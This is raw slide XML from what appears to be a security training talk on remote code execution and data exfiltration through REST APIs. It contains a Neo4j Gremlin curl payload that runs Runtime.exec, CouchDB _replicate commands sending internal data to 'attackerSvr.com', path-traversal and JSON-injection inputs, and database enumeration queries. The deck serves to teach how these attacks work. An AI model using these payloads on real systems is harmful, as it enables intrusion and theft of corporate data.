              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“id”);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urlGET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= new URL(“http://svr.com:5984/customers/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“../admin” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“?id=“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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “1&amp;_method=POST”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Change it to a POST to the following URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://svr.com:5984/admin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231" y="4252963"/>
            <a:ext cx="2182728" cy="1309637"/>
            <a:chOff x="7302" y="1608162"/>
            <a:chExt cx="2182728" cy="1309637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7302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5660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User</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="29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17233" y="4637124"/>
            <a:ext cx="462738" cy="541316"/>
            <a:chOff x="2408304" y="1992323"/>
            <a:chExt cx="462738" cy="541316"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Right Arrow 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="240830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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="240830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72052" y="4252963"/>
            <a:ext cx="2182728" cy="1309637"/>
            <a:chOff x="3063123" y="1608162"/>
            <a:chExt cx="2182728" cy="1309637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="306312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/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="310148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solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>App Server Calls</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="29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73053" y="4637124"/>
            <a:ext cx="462738" cy="541316"/>
            <a:chOff x="5464124" y="1992323"/>
            <a:chExt cx="462738" cy="541316"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Right Arrow 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5464124" y="1992323"/>
              <a:ext cx="462738" cy="5413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10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5464124" y="2100586"/>
              <a:ext cx="323917" cy="324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27872" y="4252963"/>
            <a:ext cx="2182728" cy="1309637"/>
            <a:chOff x="6118943" y="1608162"/>
            <a:chExt cx="2182728" cy="1309637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rounded Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6118943" y="1608162"/>
              <a:ext cx="2182728" cy="13096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/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6157301" y="1646520"/>
              <a:ext cx="2106012" cy="1232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Backend REST Service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97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Self Describing and Predictable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URL would you first try when gathering information about a REST API and the system that backs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8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REST is Self Describing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What URL would you first try when gathering information about a REST API and the system that backs it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://host:port/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this to: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all_tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   (in Oracle)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sp_msforeachdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 'select "?" AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, * from [?].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sys.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    (SQL Server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT DISTINCT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME IN ('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>columnA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ColumnB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>') AND TABLE_SCHEMA='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>YourDatabase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>';    (My SQL)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9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Especially for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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DBs have REST APIs which closely follow their database object structures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Couch DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mongo DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cassandra.io</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US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Find all the tables in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hbase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cluster:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://host:9000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Find the running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> version:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://host:9000/version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find the nodes in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Cluster:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://host:9000/status/cluster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find a description of a particular table’s schema(pick one from the prior link):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://host:port/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/schema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2847975" cy="157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01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Inbred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0"/>
            <a:ext cx="4357141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Externally exposed REST APIs typically use the same communication protocol (HTTP) and REST frameworks that are used in internal only REST APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any vulnerabilities which are present in the public REST API can be used against the internal REST APIs.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46" y="838200"/>
            <a:ext cx="465315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87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371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Extensions in REST frameworks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>enhance development of REST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>functionality </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>at the expense of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>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Turns remote code execution and data exfiltration from a security vulnerability into a feature.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In some cases it is subtle:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passing in partial script blocks used in evaluating the processing of nodes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passing in JavaScript functions which are used in map-reduce processes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In others it is more obvious:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passing in a complete Groovy script which is executed as a part of the request on the server.  Gremlin Plug-in for Neo4j.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passing in the source and target URLs for data replication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46855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Goals and Main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a 2 hour presentation so we will only be focusing on identifying remote code execution and data exfiltration vulnerabilities through REST APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember that a REST API is nothing more than a web application which follows a structured set of rules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So all of the previous application vulnerabilities still apply: SQL Injection, XSS, Direct Object Reference, Command Injection,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going to show you how remote code execution and data filtration manifest themselves in REST APIs.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Rest Extensions Remote Code Execution(Demo)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/>
              <a:t>curl -X POST http://localhost:7474/db/data/ext/GremlinPlugin/graphdb/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute_script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'{"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>script":"import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>java.lang.Runtime;rt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Runtime.getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>().exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c:/Windows/System32/calc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\")", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>": {} }'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H "Content-Type: application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"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Rest Extensions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Exfiltration Example (Couch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/>
              <a:t>curl –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> POST http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://internalSrv.com:5984</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/_replicate –d ‘{“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”:”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>”:”http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackerSvr.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:5984/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>corpData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”}’ –H “Content-Type: application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>json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curl –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> POST http://srv.com:5984/_replicate –d ‘{“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>”:”http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://anotherInternalSvr.com:5984/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>”:”http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackerSvr.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:5984/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>corpData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”}’ –H “Content-Type: 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Rest Extensions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Exfiltration Apply Your Knowledge(Couch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(“id”);</a:t>
            </a:r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urlPost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = new URL(“http://svr.com:5984/customers/” +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request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“name”);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json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>{\”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>fullName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>\”:\”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b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+ “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>\”}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How can you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> the data given the above?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81708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Rest Extensions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Exfiltration Apply Your Knowledge(Couch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(“id”);</a:t>
            </a:r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 = new URL(“http://svr.com:5984/customers/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../_replicate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request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“name”);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json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>{\”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>fullName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>\”:\”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X\”, \”source\”:\”customers\”, \”target\”:\”http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackerSvr.com:5984/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>corpData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>\”}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Attacker provides:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>id =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dirty="0" smtClean="0"/>
              <a:t>../_replicate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smtClean="0"/>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>source”:”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>customers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>target”:”http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attackerSvr.com:5984/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>corpData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’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Incorrect assumptions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>REST application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dirty="0" smtClean="0"/>
              <a:t>REST provides for dynamic URLs and dynamic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88232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600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REST provides for dynamic URLs and dynamic resource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>allocation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example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You have an Mongo DB REST API which exposes two databases which can only be accessed at /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>realtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/* and /predictive/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are two static ACLs which protect all access to each of these databases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smtClean="0"/>
              <a:t>web-resource-name&gt;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 User&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>web-resource-name&gt;      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&gt;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realtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-pattern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smtClean="0"/>
              <a:t>web-resource-name&gt;Predictive Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>User&lt;/web-resource-name&gt;      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&gt;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predicitive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-pattern&gt;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Can anyone see the problem?  You should be able to own the server with as little disruption to the existing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Example Case Study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is not in the two databases.  The problem is that you are working with a REST API and resources are dynamic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So POST to the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to create a new database called test which is accessible at “/test”:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	POST http://svr.com:27080/test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
